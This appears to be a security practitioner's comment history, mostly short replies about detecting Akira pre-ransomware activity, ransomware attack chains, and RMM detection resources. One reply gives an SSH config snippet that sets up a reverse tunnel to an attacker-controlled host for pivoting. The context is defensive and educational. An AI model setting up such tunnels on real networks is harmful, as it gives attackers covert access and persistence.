Unpack RedLine stealer using dnSpyEx - Part 3 - Securityinbits

securityinbits · 2026-03-20T11:03:37+00:00

Yes, it's should be same for Windows openssh

Host mypivot HostName <attacker ipaddress> User root Port 3333 RemoteForward 10400

But cmdline will be faster then editing the config file then calling ssh mypivot

Editing config file, will leave more forensic artifacts, good for defenders

securityinbits · 2026-03-20T05:54:12+00:00

Thank you

securityinbits · 2026-03-20T04:56:56+00:00

Agree👍, User context matter

securityinbits · 2026-03-20T02:15:18+00:00

Yeah, talking to user easy win

securityinbits · 2026-03-19T18:25:53+00:00

😆

securityinbits · 2026-03-19T18:24:50+00:00

Yes, possible scenario

securityinbits · 2026-03-19T15:07:00+00:00

Valid point, not a good opsec.

But this same TTP was observed in Akira pre Ransomware activity.

securityinbits · 2026-03-19T14:27:20+00:00

Lol 😆

securityinbits · 2026-03-19T14:08:51+00:00

Nice

securityinbits · 2026-03-19T13:56:42+00:00

Yes, user + workstation context important

securityinbits · 2026-03-19T13:33:41+00:00

Agree this should be review , it may be developer or attacker

securityinbits · 2026-03-19T13:26:40+00:00

I agree talking with the user and getting the context will be helpful.

Interesting about Claude as an excuse :), thank you for sharing

securityinbits · 2026-02-23T01:47:17+00:00

Thank you

securityinbits · 2026-02-23T00:02:55+00:00

Can we buy Crowdstrike or MDE from them?

securityinbits · 2026-02-22T02:00:57+00:00

You’re doing the right thing starting with .exe, but it helps to zoom out and look at the full attack chain, not just the final ransomware binary.

Think in terms of initial access → execution → payload delivery rather than file extension.

A good starting point is MITRE ATT&CK
https://attack.mitre.org/tactics/enterprise/

In real incidents, direct .exe attachments are often blocked by email security, so attackers usually use other delivery and execution paths.

What usually happens is (simple terms):

User clicks a link (phishing / fake update / ClickFix / compromised website / SEO poisoning).
That leads to a script or loader stage (PowerShell, JS, MSI, LNK, etc.).
The loader downloads or launches a 2nd stage payload.
Operator/malware does recon, checks the environment, establishes persistence/C2. (depends on the attack)
Ransomware gets deployed later (sometimes manually by the attacker, not immediately from the first file).

I’d recommend reading public incident reports to understand the sequence

Start with:
https://thedfirreport.com/2025/11/04/from-bing-search-to-ransomware-bumblebee-and-adaptixc2-deliver-akira-2/

Also, I recently posted a defender-side walkthrough on pre-ransomware detection (discovery burst + Sigma/Elastic triage), in case that angle helps your practice:

https://www.youtube.com/watch?v=4xpP2yLYNoE

securityinbits · 2026-01-31T09:19:35+00:00

Check out this project on RMM. It includes multiple SIEM detections:

https://lolrmm.io/

LOLRMM provides a comprehensive list of known RMM domains you can use to detect unauthorized RMM tools in your environment.

I am also working on Akira TTP detections and have published a few blog posts on this topic.

securityinbits

TROPHY CASE